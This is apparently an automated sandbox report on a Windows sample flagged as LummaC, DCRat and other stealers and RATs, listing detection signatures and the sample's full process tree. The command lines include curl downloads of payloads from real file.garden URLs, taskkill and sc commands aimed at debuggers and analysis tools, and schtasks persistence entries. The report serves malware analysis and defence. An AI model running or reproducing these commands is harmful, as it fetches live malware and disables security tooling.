Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UY9hUZn4CQ.exe

Overview

General Information

Sample name:UY9hUZn4CQ.exe
renamed because original name is a hash value
Original sample name:b1921e7e0377938146532a5abbd6dda82dff5008a94f921c40f0abf6844f9112.exe
Analysis ID:1522826
MD5:206addac1b15931a5a6f35222eced8c8
SHA1:297f99ca521f8a6133c39ce32d4f6e096860a4b7
SHA256:b1921e7e0377938146532a5abbd6dda82dff5008a94f921c40f0abf6844f9112
Tags:exezelensky-topuser-JAMESWT_MHT
Infos:

Detection

LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DCRat
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Excessive usage of taskkill to terminate processes
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to resolve many domain names, but no domain seems valid
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • UY9hUZn4CQ.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\UY9hUZn4CQ.exe" MD5: 206ADDAC1B15931A5A6F35222ECED8C8)
    • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7384 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7436 cmdline: C:\Windows\system32\cmd.exe /c color 7 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7472 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7904 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 7920 cmdline: taskkill /f /im HTTPDebuggerUI.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • WerFault.exe (PID: 8080 cmdline: C:\Windows\system32\WerFault.exe -pss -s 460 -p 2084 -ip 2084 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • cmd.exe (PID: 7952 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 8032 cmdline: taskkill /f /im HTTPDebuggerSvc.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 7984 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7992 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 8040 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 8000 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 8048 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • cmd.exe (PID: 8124 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 8140 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 8148 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 8176 cmdline: taskkill /f /im Ida64.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 6252 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 1180 cmdline: taskkill /f /im OllyDbg.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • imxyvi.exe (PID: 2084 cmdline: "C:\Windows\Speech\imxyvi.exe" MD5: 6E90C863F1166A43E590204D055EE08A)
      • WerFault.exe (PID: 8096 cmdline: C:\Windows\system32\WerFault.exe -u -p 2084 -s 380 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • cmd.exe (PID: 5868 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 7196 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • cmd.exe (PID: 3976 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 6956 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 6160 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 564 cmdline: taskkill /f /im Dbg64.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 7412 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 7948 cmdline: taskkill /f /im Dbg32.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • physmeme.exe (PID: 7388 cmdline: "C:\Windows\Speech\physmeme.exe" MD5: D6EDF37D68DA356237AE14270B3C7A1A)
      • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 8060 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • cmd.exe (PID: 7376 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 7592 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • cmd.exe (PID: 7660 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 7296 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 7428 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 7364 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 7416 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 5956 cmdline: sc stop HTTPDebuggerPro MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • kdmapper.exe (PID: 8012 cmdline: "C:\Windows\Speech\kdmapper.exe" MD5: C85ABE0E8C3C4D4C5044AEF6422B8218)
      • wscript.exe (PID: 4948 cmdline: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 7356 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • msedge.exe (PID: 7484 cmdline: "C:\Edge/msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
    • cmd.exe (PID: 8188 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/build.bin --output C:\Windows\Speech\rtcore64.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 8132 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/build.bin --output C:\Windows\Speech\rtcore64.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • cmd.exe (PID: 6020 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 1668 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2740 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 1360 cmdline: taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4428 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 2832 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 1868 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 1892 cmdline: taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • rtcore64.exe (PID: 2220 cmdline: "C:\Windows\Speech\rtcore64.exe" MD5: 725EA12718261F13FB96AC192729A2A4)
      • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • aspnet_regiis.exe (PID: 3768 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
    • cmd.exe (PID: 2596 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 2788 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2796 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 2916 cmdline: taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5868 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 7188 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5292 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 3952 cmdline: taskkill /f /im HTTPDebuggerUI.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4084 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 5364 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4760 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 7476 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 1424 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 7904 cmdline: taskkill /f /im HTTPDebuggerSvc.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4296 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 5096 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4200 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 4220 cmdline: sc stop HTTPDebuggerPro MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 4276 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 7228 cmdline: taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • Conhost.exe (PID: 5048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2712 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 4884 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • Conhost.exe (PID: 1472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1516 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 8036 cmdline: taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 7696 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 7432 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 7412 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 1132 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 6688 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 1708 cmdline: taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 7428 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 7392 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 8152 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 6128 cmdline: taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2224 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 8000 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2740 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 1244 cmdline: taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 1784 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 6668 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 1956 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 2972 cmdline: taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 3092 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 8088 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 760 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 7424 cmdline: taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 6660 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 4616 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 6652 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 5976 cmdline: taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 6092 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 4940 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 1488 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 5980 cmdline: taskkill /FI "IMAGENAME eq charles*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 6764 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 1028 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5744 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 7108 cmdline: taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5304 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 5948 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5772 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 6700 cmdline: taskkill /FI "IMAGENAME eq ida*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 3036 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 1852 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 7928 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 3960 cmdline: taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4460 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 372 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4932 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 4780 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • schtasks.exe (PID: 1868 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3092 cmdline: schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 4616 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 4800 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 7476 cmdline: taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5400 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 4220 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4124 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 4868 cmdline: sc stop HTTPDebuggerPro MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 5096 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 4140 cmdline: sc stop HTTPDebuggerProSdk MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
